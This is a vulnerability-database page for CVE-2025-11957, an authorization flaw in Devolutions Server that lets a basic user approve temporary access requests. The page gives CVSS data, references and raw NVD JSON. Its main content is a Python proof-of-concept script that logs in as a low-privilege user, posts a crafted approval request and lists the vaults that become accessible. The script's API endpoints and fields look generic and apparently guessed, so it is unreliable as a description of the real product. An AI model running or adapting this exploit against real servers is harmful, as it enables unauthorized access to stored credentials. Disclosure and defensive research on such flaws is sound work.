CVE-2025-11957

Description

Improper authorization in the temporary access workflow of Devolutions Server 2025.2.12.0 and earlier allows an authenticated basic user to self-approve or approve the temporary access requests of other users and gain unauthorized access to vaults and entries via crafted API requests.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* - VULNERABLE

Devolutions Server <= 2025.2.12.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-11957 PoC - Devolutions Server Improper Authorization
This PoC demonstrates the improper authorization vulnerability in Devolutions Server's 
temporary access workflow. Use only for authorized security testing.
"""

import requests
import json
import sys

# Configuration
TARGET_URL = "https://target-devolutions-server.local"
ATTACKER_USERNAME = "low_privilege_user"
ATTACKER_PASSWORD = "password123"
TARGET_USER_ID = "victim_user_id"

def authenticate():
    """Authenticate as a low-privilege user"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/api/security/login"
    
    credentials = {
        "username": ATTACKER_USERNAME,
        "password": ATTACKER_PASSWORD
    }
    
    response = session.post(login_url, json=credentials, verify=False)
    if response.status_code == 200:
        print(f"[+] Successfully authenticated as {ATTACKER_USERNAME}")
        return session
    else:
        print(f"[-] Authentication failed: {response.status_code}")
        return None

def exploit_improper_authorization(session):
    """Exploit improper authorization to approve temporary access requests"""
    
    # Step 1: Create or identify a temporary access request
    print("[*] Step 1: Identifying temporary access requests...")
    list_requests_url = f"{TARGET_URL}/api/temporary-access/requests"
    response = session.get(list_requests_url)
    
    if response.status_code != 200:
        print(f"[-] Failed to list requests: {response.status_code}")
        return False
    
    requests_data = response.json()
    
    # Step 2: Exploit improper authorization to approve own or others' requests
    print("[*] Step 2: Exploiting improper authorization...")
    
    approve_url = f"{TARGET_URL}/api/temporary-access/approve"
    
    # Craft malicious API request to approve access
    exploit_payload = {
        "requestId": requests_data[0]['id'] if requests_data else "target_request_id",
        "userId": TARGET_USER_ID,
        # Attacker can approve requests without proper authorization
        "approvedBy": ATTACKER_USERNAME,
        "notes": "Approved via crafted API request"
    }
    
    response = session.post(approve_url, json=exploit_payload, verify=False)
    
    if response.status_code in [200, 201]:
        print("[+] Successfully approved temporary access request (VULNERABLE!)")
        return True
    else:
        print(f"[-] Exploitation failed: {response.status_code}")
        return False

def access_unauthorized_resources(session):
    """Access vaults and entries after successful exploitation"""
    print("[*] Step 3: Accessing unauthorized vaults and entries...")
    
    vaults_url = f"{TARGET_URL}/api/vaults"
    response = session.get(vaults_url, verify=False)
    
    if response.status_code == 200:
        vaults = response.json()
        print(f"[+] Found {len(vaults)} vaults (including previously unauthorized ones)")
        for vault in vaults:
            print(f"    - {vault['name']} (ID: {vault['id']})")
        return True
    else:
        print(f"[-] Failed to access vaults: {response.status_code}")
        return False

def main():
    print("="*60)
    print("CVE-2025-11957 PoC - Devolutions Server")
    print("Improper Authorization in Temporary Access Workflow")
    print("="*60)
    
    # Suppress SSL warnings for testing
    requests.packages.urllib3.disable_warnings()
    
    # Authenticate as low-privilege user
    session = authenticate()
    if not session:
        sys.exit(1)
    
    # Exploit the vulnerability
    if exploit_improper_authorization(session):
        # Access unauthorized resources
        access_unauthorized_resources(session)
    
    print("\n[*] PoC completed")
    print("[!] This is for authorized security testing only")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11957
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11957
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11957/
[4] VulDB https://vuldb.com/cve/CVE-2025-11957
[5] https://devolutions.net/security/advisories/DEVO-2025-0015/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11957", "sourceIdentifier": "[email protected]", "published": "2025-10-22T17:15:56.103", "lastModified": "2025-11-25T18:15:49.353", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper authorization in the temporary access workflow of Devolutions Server 2025.2.12.0 and earlier allows an authenticated basic user to self-approve or approve the temporary access requests of other users and gain unauthorized access to vaults and entries via crafted API requests."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.2.14.0", "matchCriteriaId": "8D3F9B81-CD48-41F8-A9CC-9CCE424DF9D7"}]}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2025-0015/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}